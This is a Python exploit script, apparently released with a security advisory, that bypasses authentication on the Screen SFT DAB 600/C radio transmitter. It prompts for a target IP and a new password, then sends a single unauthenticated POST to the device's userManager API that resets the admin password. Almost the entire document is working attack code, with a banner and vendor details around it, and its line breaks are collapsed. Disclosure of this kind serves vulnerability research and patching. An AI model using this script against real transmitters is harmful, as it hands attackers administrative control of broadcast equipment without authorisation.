Screen SFT DAB 600/C Authentication Bypass / Admin Password Change

#!/usr/bin/env python3### Screen SFT DAB 600/C Authentication Bypass Admin Password Change Exploit### Vendor: DB Elettronica Telecomunicazioni SpA# Product web page: https://www.screen.it | https://www.dbbroadcast.com#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/# Affected version: Firmware: 1.9.3#                   Bios firmware: 7.1 (Apr 19 2021)#                   Gui: 2.46#                   FPGA: 169.55#                   uc: 6.15## Summary: Screen's new radio DAB Transmitter is reaching the highest# technology level in both Digital Signal Processing and RF domain.# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the# digital adaptive precorrection and configuatio flexibility, the Hot# Swap System technology, the compactness and the smart system design,# the SFT DAB are advanced transmitters. They support standards DAB,# DAB+ and T-DMB and are compatible with major headend brands.## Desc: This exploit circumvents the control and requirement of admin's# old password and directly changes the password.## Tested on: Keil-EWEB/2.1#            MontaVista® Linux® Carrier Grade eXpress (CGX)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5774# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php### 19.03.2023#import hashlib,datetime##########import requests,colorama#########from colorama import Fore, Style#colorama.init()print(Fore.RED+Style.BRIGHT+    '''██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  ██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ ██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  ██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ ██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██     '''    +Style.RESET_ALL)print(Fore.WHITE+Style.BRIGHT+    '''            ZSL and the Producers insist that no one           submit any exploits of themselfs or others              performing any dangerous activities.                 We will not open or view them.    '''    +Style.RESET_ALL)s=datetime.datetime.now()s=s.strftime('%d.%m.%Y %H:%M:%S')print('Starting API XPL -',s)t=input('Enter transmitter ip: ')p=input('Enter desired password: ')e='/system/api/userManager.cgx'm5=hashlib.md5()m5.update(p.encode('utf-8'))h=m5.hexdigest()print('Your sig:',h)print('Calling object: ssbtObj')print('CGX fastcall: userManager::changeUserPswd')t='http://'+t+ebh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',    'Accept':'application/json, text/plain, */*',    'Accept-Language':'ku-MK,en;q=0.9',    'Accept-Encoding':'gzip, deflate',    'User-Agent':'Dabber-+',    'Connection':'close'}j={'ssbtIdx':0,   'ssbtType':'userManager',   'ssbtObj':{             'changeUserPswd':{                              'username':'admin',                              'password':h                              }             },   }r=requests.post(t,headers=bh,json=j)if r.status_code==200:    print('Done.')else:    print('Error')exit(-2)